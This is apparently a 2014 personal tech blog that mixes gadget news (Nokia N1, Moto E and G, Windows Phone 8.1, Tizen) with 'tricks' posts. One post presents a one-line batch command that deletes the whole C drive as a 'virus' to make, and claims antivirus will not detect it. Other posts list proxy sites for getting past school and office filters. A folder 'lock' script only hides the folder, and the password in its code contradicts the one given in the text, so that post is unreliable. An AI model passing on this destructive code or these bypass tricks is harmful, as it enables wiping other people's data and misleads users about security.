Tuesday, November 18, 2014

Nokia N1 Android tablet is announced

WTF! is it nokia, really ???
well yes, its nokia finally with android (Android 5.0 Lollipop

The Nokia N1 tablet – a compact, stylish, and inexpensive tablet running Google's Android operating system.

The Nokia N1 is a sleek, aluminum-made device with a thickness of just 6.9 millimeters. And at 318 grams, the device is both slimmer and lighter than the leader in the segment, like iPad mini 3

7.9-inch IPS LCD display with a resolution of 2048 by 1536 pixels and an aspect ratio of 4:3.
it is absolutely Apple's iPad mini 3 again as it is matched by the N1, at least specs-wise. The fully laminated, zero air-gap screen is protected by a layer of Gorilla Glass 3. 
battery-18.5 Wh (5300 mAh)

64-bit Intel Atom Z3580 processor with a 2.3GHz maximum clock speed alongside a 533MHz PowerVR G6430 GPU, 2GB of RAM, and 32GB of storage.
Bluetooth 4.0 and Wi-Fi 802.11a/b/g/n/ac at 2.4 and 5GHz and MIMO antennas for better reception. there's no GPS or cellular connectivity on board.

sources :- http://n1.nokia.com/
Nokia N1Nokia N1

Thursday, September 25, 2014

Best innovation of IFA 2014

"Samsung's Galaxy Note Edge comes with a  new feature - a curved screen area to the side, which is used to display notifications, app controls, and more many things"

IFA 2014
has brought us a plethora of new innovation, with a bunch of new and exciting devices with of impressive new technology. However, there was one new feature presented at the show that managed to impress the most.
the Note Edge brought our favorite innovation from the show - the so-called Edge screen.
The Note Edge's Edge screen actually serves a useful purpose, as it's designed to house certain features and controls throughout the system's core application

Monday, June 30, 2014

Tizen - Samsung's 'OS of Everything'

Tizen is a new Operating System initiative by Intel and Samsung. It can be seen as a replacement for MeeGo based on more modern and open Standards such as HTML5 and Wholesale Applications Community (WAC). Tizen Apps will be created with the latest and most versatile standards. The System will run across a wide spectrum of devices, including smartphones, tablets, smart-TVs, netbooks and in-car infotainment systems. Computer Hardware brands like Asus and Acer have already joined the Tizen movement, other smartphone makers like HTC are expected to join.



Tizen is a Linux-based OS,its not only about phone,Tizen is also about cars, TVs, home automation, wearables, and more.

The plan now is to hitch Tizen – which has struggled to gain a foothold, or even a foot in the door, of the smartphone market – to that latest buzzword du jour, the Internet of Things.

"So far, we've created three profiles for mobile, wearables, and cars," said Intel's Imad Sousou, co-chair of the Tizen Steering Group, during Tuesday morning's keynote. "Over the next few months we are working on creating another three profiles for TVs, cameras, and home appliances."

Tuesday, May 13, 2014

Motorola Moto E


Moto E India launch

After high on the success of Moto G, Motorola today launched its new Android smartphone in India – Moto E. Priced at Rs. 6,999, the new Motorola smartphone is expected to have a big impact on the budget smartphone segment in India, especially the under 10k segment.
 New Motorola Moto E images and specs revealed, colorful Moto Shells included
  • Android 4.4 KitKat
  • 3G connectivity, Wi-Fi
  • 5MP rear camera without Flash (there's no front-facing camera)
  • Dual-core 1.2GHz Qualcomm Snapdragon processor 
  • 1GB of RAM
  • 4GB of internal memory 
  • microSD card support (up to 32GB)
  • 1,980 mAh battery
  • 4.3 inch screen with 540 x 960 pixels resolution
  • 140 grams

Thursday, April 3, 2014

Windows Phone 8.1 new features

Microsoft has finally caught up with market leaders Android and iOS in the mobile OS race with the new Windows Phone 8.1 update.

microsoft_build_conference_ap.jpg

here is the some new updates ------------>>>>

  • Action Center

Windows Phone platform has finally received a notification menu, named Action Center. Much like Android, you just need to swipe downward from the top of the screen to open Action Center, which has one-touch shortcuts for settings like Wi-Fi, Flight Mode, Bluetooth and Rotation Lock.

Action Center will also notify users about missed calls, unread emails and messages, and updates from various apps.
  • Cortana

The highlighting feature of Windows Phone 8.1 is Cortana, Microsoft’s digital voice assistant.

Named after the Artificial Intelligence character from the Halo game, Cortana is powered by Microsoft's Bing search engine and notifies users of phone calls, emails and messages; lets them set appointments and reminders, perform searches and operate the music player etc hands-free. It is also able to track users' online searches as well as new calendar entries and also access third-party apps.

The feature will be rolled out in the US initially as a beta product and will hit the UK and China later this year.It will be launched in other markets, including India, in 2015
  • Revamped app store

The Windows app store has undergone a major revamp, with new apps working across all key platforms – PCs, smartphones and tablets. Microsoft is also working on eventually making the same apps compatible with the Xbox One gaming console, which can also act as a media streaming device.

Despite being compatible across various platforms, these apps will have designs specific to each type of device, said Microsoft. These cross-platform apps will be denoted by a ‘Universal App’ icon.

Developers can choose to make separate apps for each platform as well. The layout of the Store app has been changed.
  • Word Flow Keyboard

Microsoft’s take on popular keyboard app Swype, Word Flow is the new default keyboard of the Windows Phone 8.1 platform. Users will be able to input words by simply swiping on the letters on the word, so that typing on a touchscreen becomes faster.
  • Custom Live Tile background

Users will now be able to set a background of their choice for Windows Phone’s home screen tiles. Similar to wallpapers in Android and iOS, the wallpapers will be set as the background for tiles that have been pinned to the start screen of the device.

Microsoft says this feature will “make many of the tiles on your Start screen become clear so you can see the background you selected as you scroll up and down.” Users can choose from the images that come preloaded in the phone or a picture from the phone’s photo gallery.
  • Lock screen themes

Just like tile backgrounds, users can pick the lock screen style in Windows Phone 8.1. Microsoft showed two themes – one with diagonal pattern and other with circular design. Each theme shows time, date, notifications and upcoming calendar appointments in different ways.

At present, Microsoft will not share the APIs of the custom theme feature with third-party developers, but will open up in coming months.
  • Internet Explorer 11

Windows Phone 8.1 marks the debut of Internet Explorer (IE) 11, the stock web browser. IE11 is optimized for reading on the web and can keep track of tabs open on users’ desktops, so that they can carry on reading the same website across different devices.

Passwords will also be synced across different platforms (smartphone, tablet and desktop) that a user has logged into. The InPrivate browsing mode will not store history and delete cookies once a tab is closed
  • Improved Sense functions

Microsoft has upgraded the Sense functions to make them more effective in optimizing the user experience.

Data Sense now allows users to see how much data has been downloaded over a certain period, detailing consumption by each app. When the feature is turned on, the phone will automatically compress images on web pages, so that the page loads without too much data consumption.

Wi-Fi Sense will now automatically search for open Wi-Fi networks, so that the phone does not consume too much mobile data. It will even allow you to share the Wi-Fi network of your house with others without revealing the password.
  • On-screen keys

Just like Android gadgets, Windows Phone 8.1 handsets will now feature on-screen keys. With the three on-screen keys (Back, Home and Search) of WP platform, big-screen devices can be made more compact and easier to hold.




Wednesday, February 19, 2014

Downloading Torrent Using Internet Download Manager(IDM)


The way to download torrents with Internet Download Manager. Torrent is tiny file with .torrent extension which allows you to download huge amount of data. We use torrents to download various stuffs like movies, games, software package and plenty of different things. you'll transfer torrents from several website

How To Transfer Torrent With IDM

1. First download the torrent file with .torrent extension which you wish to download from the internet directly without any torrent client like utorrent.
Downloading Torrent Using Internet Download Manager

2. Now open zbigz.com and you will land on its homepage.
3. Then Click on upload Torrent and browse your torrent to transfer and click on Go.
4. Then it will ask you for Free or Premium service, choose Free to proceed further.
5. It will take some time to cache your file. Once the caching is done, click on transfer button to download your file as shown below.
Downloading Torrent Using Internet Download Manager
6. You should have internet download manager installed on your computer so that download start inside IDM. If you don't have IDM don't worry it will download directly.

Note: If you decide on to use Free transfer then you wont be able to transfer file of more then 1 GB

by Nakib Momin

Friday, February 7, 2014

Motorola to re-enter India with Moto G

Motorola, which had exited the Indian market in mid 2012, is now reportedly all set to make its re-debut in the ever expanding Indian mobile phone market by launching its latest Moto G smartphone in the country through e commercial site flipkart.com

 

KEY FEATURES OF MOTO G

  • 5 MP Primary Camera and 1.3 MP Secondary Camera
  • 4.5-inch HD Display
  • HD Recording
  • Wi-Fi Enabled
  • 1.2 GHz Qualcomm Snapdragon 400 Quad Core Processor and 1 GB RAM
  • Dual SIM (GSM + GSM)
  • 8 GB or 16 GB Internal Memory
  • Android v4.3 (Jelly Bean) OS

The Moto G can be upgraded to Android 4.4 Kitkat which has voice support, an Immersive mode, synced messages, easier sharing, much faster multitasking and more.

biggest que was,by whom they are  going to give customer care service?

feel free to comment ...........

Tuesday, January 21, 2014

Use Facebook Blocker

How To Use Facebook Blocker ? 

 1. First download Facebook Blocker by Clicking Here
 2. Extract the file and right click on Facebook Blocker.exe and run it as administator(Important)
 3. Press 1 in order to  backup your host file to be on the safe side.
facebook blocker
  4. Now Press 2 to block facebook
  5. Its time to check if facebook is blocked or not to do that Press 5
  6. Hope this help you

How To Block Youtube Ads ?


block youtube ads
Most of you get bored or annoyed due ads playing before youtube videos. Today i willshare with you an amazing peace of programme called Block YouTube Ads . It removes all video ads before and during videos, as well as removes all those ads that pop at the bottom of the screen while the video is playing. It works on all major browser such Internet explorer, google chrome and mozilla firefox.

How to do ?

  1. Download Youtube Ads Blocker
  2. Double click on downloaded file.
  3. Follow the on screen instruction.

Password Protect Any Folder Without Any Software

In this tutorial you will learn interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
 
 
cls
@ECHO OFF
title 4geeksworld.blogspot.in
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== 4geeksworld goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is geeksworld)
  • To change the password replace geeksworld with new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Most Common Password Cracking Methods And Their Countermeasures

There are number of methods out their used by hackers to hack your account or get your personal information. Today in this post i will share with you guys 6 Most commonly used method to crack password and their countermeasures. You must check out this article to be safe and to prevent your online accounts from hacking.

1. BruteForce Attack

brute force attack
Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the rightpassword is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computerand complexity of the password.

Countermeasure: Use long and complex passwords. Try to use combination of upper and lowercase letters along with numbers. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.
Example: Passwords like "iloveu" or "password" can be cracked easily whereas computer will take years to crack passwords like "aN34lL00"

2. Social Engineering

Social engineering is process of manipulating someone to trust you and get information from them. For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.

Countermeasure: If someone tries to get your personal or bank details ask them few questions. Make sure the person calling you is legit. Never ever give your credit card details on phone.

3. Rats And Keyloggers

keylogger
In keylogging or RATing the hacker sends keylogger or rat to the victim. This allows hacker to monitor every thing victim do on his computer. Every keystroke is logged including passwords. Moreever hacker can even control the victims computer.

Countermeasure: Never login to your bank account from cyber cafe or someone else computer. If its important use on-screen or virtual keyboard while tying the login. Use latest anti-virus software and keep them updated. 

    4. Phishing

    phishing hacking
    Phishing is the most easiest and popular hacking method used by hackers to get someone account details. In Phishing attack hacker send fake page of real website like facebook, gmail to victim. When someone login through that fake page his details is send to the hacker. This fake pages can be easily created and hosted on free web-hosting sites.

    Countermeasure: Phishing attacks are very easy to avoid. The url of this phishing pages are different from the real one. For example URL of phishing page of facebook might look like facbbook.com (As you can see There are two "b"). Always make sure that websites url is correct.

    5. Rainbow Table

    A Rainbow table is a huge pre-computed list of hashes for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm such as md5 and is transformed into something which is not recognizable. A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string. A very commonly used hashing algorithm to store passwords in website databases is MD5. It is almost similar to dictionary attack, the only difference is, in rainbow tables attack hashed characters are used as passwords whereas in dictionary attack normal characters are used as passwords. 

    Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string ("") is d41d8cd98f00b204e9800998ecf8427e

    Countermeasure: Make sure you choose password that is long and complex. Creating tables for long and complex password takes a very long time and a lot of resources

    6. Guessing

    password guessing
    This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess yourpassword. Hacker can also use combination of Social Engineering and Guessing to acquire your password.

    Countermeasure: Don't use your name, surname, phone number or birthdate as your password. Try to avoid creating password that relates to you. Create complex and long password with combination of letters and numbers.

    Create A Undeletable And Unrenamable Folders In Windows

    creating undeleteable files
    In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

    Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

    How To Create Undeletable And Unrenamable Folders ?

    1. Go to Start and then Click on Run
    2. Type cmd & hit enter (To open Command Prompt ).
    3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
    4. Type D: or E: and hit enter
    5. Type md con\ and hit enter (md - make directory)
    6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
    7. Open that directory, you will see the folder created of name con.
    8. Try to delete that folder or rename that folder windows will show the error message.

    How to delete that folder ?

    It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
    1. Open Command Prompt
    2. Type D: ( if u created this type of folder in D: drive) & hit enter
    3. Type rd con\ (rd - remove directory)
    4. Open that directory and the folder will not appear because it is removed.

    Simple & dangerous virus,make it



    How to Make the virus ?

       1. Open Notepad and copy below code into it.

                               @Echo off
                               Del C:\ *.* |y

       2. Save this file as virus.bat (Name can be anything but .bat is must)
       3. Now, running this file will delete all the content of C Drive.


    Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
    You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus

    How to open facebook and block web from school and restricted places



    Below is the list of some good proxy site which you can use to surf anonymously on the internet . Even you can use this proxy sites to open block website in school or offices. For example you can use facebook if it is block at your school or office.
    Washington Woman Has Weight Loss Photo Banned by Facebook
    Here is proxy list:--

    http://aniscartujo.com/webproxy
    http://www.badboysproxy.com
    http://www.surfscreened.com
    http://www.hagiomusic.info
    http://www.greenpips.info
    http://urlbrowse.com
    http://www.hideipaddress.net
    http://www.sneakfilter.com
    http://www.browsestealth.com
    http://www.sneak1.info
    http://proxiesrus.com
    http://www.surfindark.com
    http://www.navydog.com
    http://falsario.com
    http://www.proxypit.com
    http://www.proxypan.com
    http://myspacewebproxy.org/
    http://www.allfreehere.info
    http://www.takefreely.info
    http://autobypass.com
    http://www.proxcity.info
    http://www.proxyzip.org
    http://www.cheekyproxy.com
    http://www.eggproxy.com
    http://www.theschoolcloak.com
    http://www.hidemefast.com
    http://browseanywhere.info
    http://www.404surf.com
    http://www.cloakip.net
    http://www.browsedark.com
    http://www.dartprox.com
    http://www.proxish.com
    http://www.surfsneak.com
    http://www.surfsneaky.com
    http://www.browsehidden.com
    http://www.filterhide.com
    http://www.browsesneak.com
    http://myspaceproxyy.com
    http://www.browsesneaky.com
    http://www.proxyz.us
    http://www.sneakschool.com
    http://www.iphide.com
    http://www.proogle.info
    http://greatproxy.info
    http://www.playnsurf.info
    http://www.realproxy.info
    http://aplusproxy.com
    http://www.ecoproxy.com
    http://freedom.webtuo.com
    http://www.slyuser.com/
    http://tenpass.com
    http://pawxy.com
    http://pawxy.org
    http://logu.in

    How To Open Banned Websites

    How To Open Banned Websites With Proxy Site? 

    How To Open Banned Site ?

    1. Open www.incloak.com in your browser.
    You can also use any proxy site from list below
    • List Of Good Proxy Sites are at last of the post
    2. After that enter the URL of the site which you want to open like below.
    Open Banned Websites WIth Proxy Sites
    3. Now click the Hide Me button,that's it.

    list:-

    http://aniscartujo.com/webproxy
    http://www.badboysproxy.com
    http://www.surfscreened.com
    http://www.hagiomusic.info
    http://www.greenpips.info
    http://urlbrowse.com
    http://www.hideipaddress.net
    http://www.sneakfilter.com
    http://www.browsestealth.com
    http://www.sneak1.info
    http://proxiesrus.com
    http://www.surfindark.com
    http://www.navydog.com
    http://falsario.com
    http://www.proxypit.com
    http://www.proxypan.com
    http://myspacewebproxy.org/
    http://www.allfreehere.info
    http://www.takefreely.info
    http://autobypass.com
    http://www.proxcity.info
    http://www.proxyzip.org
    http://www.cheekyproxy.com
    http://www.eggproxy.com
    http://www.theschoolcloak.com
    http://www.hidemefast.com
    http://browseanywhere.info
    http://www.404surf.com
    http://www.cloakip.net
    http://www.browsedark.com
    http://www.dartprox.com
    http://www.proxish.com
    http://www.surfsneak.com
    http://www.surfsneaky.com
    http://www.browsehidden.com
    http://www.filterhide.com
    http://www.browsesneak.com
    http://myspaceproxyy.com
    http://www.browsesneaky.com
    http://www.proxyz.us
    http://www.sneakschool.com
    http://www.iphide.com
    http://www.proogle.info
    http://greatproxy.info
    http://www.playnsurf.info
    http://www.realproxy.info
    http://aplusproxy.com
    http://www.ecoproxy.com
    http://freedom.webtuo.com
    http://www.slyuser.com/
    http://tenpass.com
    http://pawxy.com
    http://pawxy.org
    http://logu.in